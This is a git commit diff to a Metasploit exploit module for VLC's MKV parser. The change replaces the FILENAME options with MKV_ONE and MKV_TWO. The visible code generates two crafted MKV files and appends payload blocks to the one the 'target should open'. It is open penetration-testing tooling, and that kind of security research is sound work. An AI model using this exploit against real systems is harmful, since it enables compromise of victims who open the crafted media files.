Filename options

exploit:vlc_mkv overwrite fileformat filename method
to supply options
GSoC/Meterpreter_Web_Console
Jacob Robles 2018-10-09 21:07:49 -05:00
parent 94f260f289
commit 1cb8418b2d
No known key found for this signature in database
GPG Key ID: 3EC9F18F2B12401C
1 changed files with 26 additions and 15 deletions

View File

@ -101,10 +101,12 @@ class MetasploitModule < Msf::Exploit::Remote
'DisclosureDate' => 'May 24 2018', 'DisclosureDate' => 'May 24 2018',
'DefaultTarget' => 1)) 'DefaultTarget' => 1))
register_options([ register_options [
OptString.new('FILENAME', [true, 'The file name.', 'msf.mkv']), OptString.new('MKV_ONE', [false, 'mkv that should be opened', '']),
OptString.new('AUX_FILENAME', [true, 'The auxiliary file name.', 'auxi.mkv']) OptString.new('MKV_TWO', [false, 'The auxiliary file name.', ''])
]) ]
deregister_options('FILENAME')
end end
def to_bytes(num, length, endianess = 'big') def to_bytes(num, length, endianess = 'big')
@ -274,22 +276,31 @@ class MetasploitModule < Msf::Exploit::Remote
mkv1, simple_block, count = generate_mkv mkv1, simple_block, count = generate_mkv
mkv2 = mkv1[0, 0x4f] + "\x15\x49\xa9\x66" + data_size(10) mkv2 = mkv1[0, 0x4f] + "\x15\x49\xa9\x66" + data_size(10)
print_status("Creating '#{datastore['FILENAME']}'. This is the file your victim should open.") tmpname = rand_text_alpha_lower(3..8)
file_create(mkv1) f1 = datastore['MKV_ONE'].empty? ? "#{tmpname}-part1.mkv" : datastore['MKV_ONE']
f1 << '.mkv' unless f1.downcase.end_with?('.mkv')
# Finish writing the payload simple_blocks f2 = datastore['MKV_TWO'].empty? ? "#{tmpname}-part2.mkv" : datastore['MKV_TWO']
print_status("Writing payload blocks") f2 << '.mkv' unless f2.downcase.end_with?('.mkv')
path = File.join(Msf::Config.local_directory, datastore['FILENAME'])
file_format_filename(f1)
file_create(mkv1)
print_status("Created #{f1}. Target should open this file")
file_format_filename(f2)
file_create(mkv2)
print_status("Created #{f2}. Put this file in the same directory as #{f1}")
print_status("Appending blocks to #{f1}")
path = File.join(Msf::Config.local_directory, f1)
full_path = ::File.expand_path(path) full_path = ::File.expand_path(path)
File.open(full_path, 'ab') do |fd| File.open(full_path, 'ab') do |fd|
count.times { fd.write(simple_block) } count.times { fd.write(simple_block) }
end end
print_good("Payload successfully written") print_good("Succesfuly appended blocks to #{f1}")
end
original_fname = datastore['FILENAME'] def file_format_filename(name = '')
datastore['FILENAME'] = datastore['AUX_FILENAME'] name.empty? ? @fname : @fname = name
print_status("Creating '#{datastore['AUX_FILENAME']}'. Put this file in the same directory as the main mkv file")
file_create(mkv2)
datastore['FILENAME'] = original_fname
end end
end end